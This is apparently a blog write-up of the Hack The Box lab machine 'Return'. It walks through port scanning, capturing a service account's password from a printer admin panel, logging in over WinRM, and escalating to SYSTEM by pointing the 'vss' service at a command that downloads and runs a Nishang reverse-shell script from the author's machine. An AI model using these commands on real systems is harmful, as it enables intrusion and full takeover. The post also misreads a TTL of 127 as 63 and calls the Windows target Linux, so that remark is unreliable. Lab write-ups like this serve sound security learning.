Post

Write-up Return on HTB

It was a while back that I was hacking a machine on HTB because it was quite busy lately. Today I was a little more relaxed so I could spend some time on HTB. I saw a Windows machine “Return” which I haven’t had yet.

Getting started

After logging in to HTB I started the machine Return and soon I had the IP address of my target on my screen. On Kali I quickly opened my terminal to declare the IP address of my target as a variable so that I have less typing work later.

1
2
┌──(eMVee@kali)-[~]
└─$ ip=10.129.138.232  

As soon as the IP address was declared as variable, I performed a ping request to see if my target was reachable.

1
2
3
4
5
6
7
8
9
10
11
┌──(eMVee@kali)-[~]
└─$ ping -c3 $ip
PING 10.129.138.232 (10.129.138.232) 56(84) bytes of data.
64 bytes from 10.129.138.232: icmp_seq=1 ttl=127 time=17.5 ms
64 bytes from 10.129.138.232: icmp_seq=2 ttl=127 time=16.7 ms
64 bytes from 10.129.138.232: icmp_seq=3 ttl=127 time=16.5 ms

--- 10.129.138.232 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 16.528/16.901/17.484/0.417 ms

The machine replied nicely to my ping request and I already saw that the time to live value 63 was returned. So as I now interpret the answer is that my target is a Linux machine.

Enumeration is key

To know which ports are open and which services are active I run the following nmap command: sudo nmap -sC -sV -T5 -p- -A -O $ip.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
┌──(eMVee@kali)-[~]
└─$ sudo nmap -sC -sV -T5 -p- -A -O $ip
[sudo] password for eMVee: 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-11 10:27 CET
Nmap scan report for 10.129.138.232
Host is up (0.017s latency).                                                                                                                         
Not shown: 65510 closed ports                                                                                                                         
PORT      STATE SERVICE       VERSION                                                                                                                     
53/tcp    open  domain        Simple DNS Plus                                                                                                             
80/tcp    open  http          Microsoft IIS httpd 10.0                                                                                                      
| http-methods:                                                                                                                                             
|_  Potentially risky methods: TRACE                                                                                                                          
|_http-server-header: Microsoft-IIS/10.0                                                                                                                      
|_http-title: HTB Printer Admin Panel                                                                                                                         
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-02-11 09:46:40Z)                                                                    
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                             
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                      
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)                                    
445/tcp   open  microsoft-ds?                                                                                                                                    
464/tcp   open  kpasswd5?                                                                                                                                        
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                                                                
636/tcp   open  tcpwrapped                                                                                                                                 
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)                              
3269/tcp  open  tcpwrapped                                                                                                                                 
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                      
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                
|_http-title: Not Found                                                                                                                                    
9389/tcp  open  mc-nmf        .NET Message Framing                                                                                                         
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                      
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                
|_http-title: Not Found                                                                                                                                    
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows 2012|2016|7|2008|Vista|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_vista::sp1:home_premium cpe:/o:microsoft:windows_10:1511 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2016 (86%), Microsoft Windows 7 SP1 (86%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 (86%), Microsoft Windows Windows 7 SP1 (86%), Microsoft Windows Vista Home Premium SP1, Windows 7, or Windows Server 2008 (86%), Microsoft Windows Vista SP1 (86%), Microsoft Windows Server 2012 Data Center (86%), Microsoft Windows 10 1511 (85%), Microsoft Windows 10 1709 - 1909 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 18m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-02-11T09:47:36
|_  start_date: N/A

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   16.92 ms 10.10.14.1
2   17.21 ms 10.129.138.232

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.12 seconds

From the nmap scan result I extract some data which I think is important.

  • Windows, probably one of these: 2012201672008Vista10
  • Port 53
    • Simple DNS Plus
  • Port 80
    • Microsoft IIS httpd 10.0
    • HTB Printer Admin Panel
  • Port 88
    • Microsoft Windows Kerberos
  • Port 135, 139, 445
    • Probably SMB running?
  • Port 389
    • LDAP
  • Other ports where I have to look into if these failing.

Let’s check the website on port 80 first before moving on to enumerating the other ports. The webpage title sounded interesting enough to start here.

1
2
3
4
5
┌──(eMVee@kali)-[~]
└─$ whatweb http://$ip      
http://10.129.138.232 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.129.138.232], 
Microsoft-IIS[10.0], PHP[7.4.13], Script, Title[HTB Printer Admin Panel], X-Powered-By[PHP/7.4.13]

Like nmap, Whatweb found the following information.

  • Microsoft IIS 10.0
  • PHP 7.4.13
  • Title: HTB Printer Admin Panel

Since I still don’t know much I decided to run nikto against this target.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(eMVee@kali)-[~]
└─$ nikto -h http://$ip
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.129.138.232
+ Target Hostname:    10.129.138.232
+ Target Port:        80
+ Start Time:         2022-02-11 10:32:06 (GMT1)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ Retrieved x-powered-by header: PHP/7.4.13
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2022-02-11 10:34:44 (GMT1) (158 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Since there is nothing new found with Nikto. So let’s check what is shown to us in the browser. Image

I can inspect the website without any form of login. There are not many functionalities available on the website. So before sending the form, I turned Burp Suite in FoxyProxy on and I started Burp Suite in the background.

Image

By hitting the Update (submit) button I could inspect the POST request which is send.

Image

In the request I can see the hostname or IP address is send to the server. By wondering, what will happen if I change this to my IP address and start a listener on that port which is stated in the webpage? I start within my terminal a netcat listener on port 389.

1
2
3
┌──(eMVee@kali)-[~]
└─$ sudo nc -lvp 389     
listening on [any] 389 ...

While the listener is running in the background I change the hostname to my IP address and send the POST request to the server.

1
2
3
4
5
6
7
┌──(eMVee@kali)-[~]
└─$ sudo nc -lvp 389       
listening on [any] 389 ...
10.129.138.232: inverse host lookup failed: Unknown host
connect to [10.10.14.26] from (UNKNOWN) [10.129.138.232] 50928
0*`%return\svc-printer�
                       1edFg43012!!

Within the Netcat listener a username and password is shown to me.

  • svc-printer
  • 1edFg43012!!

Probably I can do something else with this information. Let’s check what I can find with enum4linux and the username svc-printer.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(eMVee@kali)-[~]
└─$ enum4linux -k svc-printer $ip
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Feb 11 11:21:27 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.129.138.232
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. svc-printer


 ====================================================== 
|    Enumerating Workgroup/Domain on 10.129.138.232    |
 ====================================================== 
[E] Can't find workgroup/domain


 ======================================= 
|    Session Check on 10.129.138.232    |
 ======================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.129.138.232 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 ============================================= 
|    Getting domain SID for 10.129.138.232    |
 ============================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: RETURN
Domain Sid: S-1-5-21-3750359090-2939318659-876128439
[+] Host is part of a domain (not a workgroup)
enum4linux complete on Fri Feb 11 11:21:37 2022

Well, that was a bit disappointing. I had already seen that the machine is a member of a domain with nmap scan. Perhaps the smb would provide some additional information with crackmapexec. The comand which I used looked like this: crackmapexec smb $ip -u svc-printer -p ‘1edFg43012!!’

1
2
3
4
5
┌──(eMVee@kali)-[~]
└─$ crackmapexec smb $ip -u svc-printer -p '1edFg43012!!'
SMB         10.129.138.232  445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.129.138.232  445    PRINTER          [+] return.local\svc-printer:1edFg43012!! 

WinRM listens by default on port 5985 or 5986 (SSL) and since I did see it open in the first nmap scan, I want to verify whether this is actually the case.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(eMVee@kali)-[~]
└─$ sudo nmap $ip -Pn -sV -v --script=~/winrm.nse -p 5985
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-11 11:25 CET
NSE: Loaded 46 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:25
Completed Parallel DNS resolution of 1 host. at 11:25, 0.01s elapsed
Initiating SYN Stealth Scan at 11:25
Scanning 10.129.139.66 [1 port]
Discovered open port 5985/tcp on 10.129.139.66
Completed SYN Stealth Scan at 11:25, 0.33s elapsed (1 total ports)
Initiating Service scan at 11:25
Scanning 1 service on 10.129.139.66
Completed Service scan at 11:25, 6.05s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.139.66.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.15s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.08s elapsed
Nmap scan report for 10.129.139.66
Host is up (0.019s latency).

PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_winrm: WinRM service detected
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.24 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)

As expected, WinRM is running and we may be able to create a connection to the machine.

Getting initial foothold

With evil-winrm we can set up an interactive shell with the svc-printer user.

1
2
3
4
5
6
7
8
9
┌──(eMVee@kali)-[~]
└─$ evil-winrm -i $ip -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> 

We managed to connect to the machine with evil-winrm. Now that a connection has been made with the machine, it is time to see what information can be used. First I want to know which user I am on the machine and what permissions it has.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /all

USER INFORMATION
----------------

User Name          SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103


GROUP INFORMATION
-----------------2

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> 

What immediately strikes me is that the user has many rights, more than you would expect. I had not yet viewed the user’s flag and submitted it to HTB. In general, it’s on the user’s desktop, so let’s start there.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
*Evil-WinRM* PS C:\Users\svc-printer> cd ..
*Evil-WinRM* PS C:\Users\svc-printer> dir


    Directory: C:\Users\svc-printer


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        5/26/2021   2:05 AM                Desktop
d-r---        5/26/2021   1:51 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\svc-printer> cd Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> dir


    Directory: C:\Users\svc-printer\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/11/2022   1:44 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
<---- FLAG ---->

Now the user flag has been captured, it is time to enumerate a bit more. Let’s check the hostname and IP configuration.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\windows> hostname
printer
*Evil-WinRM* PS C:\windows> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::202
   IPv6 Address. . . . . . . . . . . : dead:beef::68b4:9ce:9b4e:bf5
   Link-local IPv6 Address . . . . . : fe80::68b4:9ce:9b4e:bf5%10
   IPv4 Address. . . . . . . . . . . : 10.129.138.232
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%10
                                       10.129.0.1

As aspected this machine has one IP address, so nothing useful for now. Now let’s see which memberships the user svc-printer has.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
*Evil-WinRM* PS C:\windows> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

So the user has some memberships assigned to his account which I will check at a later moment. Let’s enumerate the users on the system with the command net user to see which other users are present on the system.

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\windows> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
svc-printer
The command completed with one or more errors.

Since there are not much users on the system I decided to check the svc-printer user for more information with net user svc-printer.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
*Evil-WinRM* PS C:\windows> net user svc-printer
User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 12:15:13 AM
Password expires             Never
Password changeable          5/27/2021 12:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/26/2021 12:39:29 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.

The svc-printer user is a member of the following local groups:

  • Print Operators
  • Remote Management Use
  • Server Operators

Server Operators already have some rights within a Windows Domain Controller by default according to hacktricks. Since any user with the service operator has permissions to stop and start services this could be interesting as attacker when you have a service account with those permissions.

In this case I would like to use the Powershell TCP reverse shell of Nishang and start is as a service to escalte my privileges. I copied the file to my working directory, so I could edit the file with Visual Code to add a line so the file would create a reverse shell to my machine a soon the files is loaded.

1
2
3
4
5
┌──(eMVee@kali)-[~/Documents/usefull]
└─$ cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
                                                                                                                    
┌──(eMVee@kali)-[~/Documents/usefull]
└─$ code shell.ps1                                                 

I added the wfollowing piece to the end of the file: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.26 -Port 1234.

Privilege escalation

Since svc-printer is member of the Server Operator you are able to run the sc.exe within the terminal. It creates a subkey and entries for a service in the registry and in the Service Control Manager database according Microsoft. This could be used to create our own service which run our Powershell script for a reverse shell. If this works, probably a connection as NT Authority has been set up.

Before a service is created with a reverse shell to my machine, I have to start a netcat listener on port 1234.

1
2
3
┌──(eMVee@kali)-[~]
└─$ nc -lvp 1234                                                          
listening on [any] 1234 ...

Now that the netcat listener is up and running, all I need to do is make sure my python web server is running and hosting the correct file.

1
2
┌──(eMVee@kali)-[~/Documents/usefull]
└─$ sudo python3 -m http.server 80           

Everything is ready on my machine, now I can configure and start my service on the target. As soon as the service is started my reverse shell should start working.

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\windows\temp> sc.exe config vss binPath="C:\Windows\System32\cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.26/shell.ps1')"
[SC] ChangeServiceConfig SUCCESS

*Evil-WinRM* PS C:\windows\temp> sc.exe stop vss
[SC] ControlService FAILED 1062:

The service has not been started.

*Evil-WinRM* PS C:\windows\temp> sc.exe start vss

The machine doesn’t seem to respond after the last command, but this could also be positive, just as the web browser on a web shell sometimes doesn’t respond due to loading. So it’s time to take a look at the netcat listener.

1
2
3
4
5
6
7
8
9
┌──(eMVee@kali)-[~]
└─$ nc -lvp 1234                                                          
listening on [any] 1234 ...
10.129.138.232: inverse host lookup failed: Unknown host
connect to [10.10.14.26] from (UNKNOWN) [10.129.138.232] 63477
Windows PowerShell running as user PRINTER$ on PRINTER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>

It workerd! So let’s see who I am on the machine by running the command: whoami;hostname;ipconfig.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PS C:\Windows\system32>whoami;hostname;ipconfig
nt authority\system
printer

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::202
   IPv6 Address. . . . . . . . . . . : dead:beef::68b4:9ce:9b4e:bf5
   Link-local IPv6 Address . . . . . : fe80::68b4:9ce:9b4e:bf5%10
   IPv4 Address. . . . . . . . . . . : 10.129.138.232
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%10
                                       10.129.0.1
PS C:\Windows\system32> 

Since the user is the nt authority\system, we can fully control the machine and get the last flag on this machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\Windows\system32> cd c:\users\administrator\desktop
PS C:\users\administrator\desktop> dir


    Directory: C:\users\administrator\desktop


Mode                LastWriteTime         Length Name    
----                -------------         ------ ----    
-ar---        2/11/2022   1:44 AM             34 root.txt


PS C:\users\administrator\desktop> type root.txt
<---- FLAG ---->
PS C:\users\administrator\desktop> 
This post is licensed under CC BY 4.0 by the author.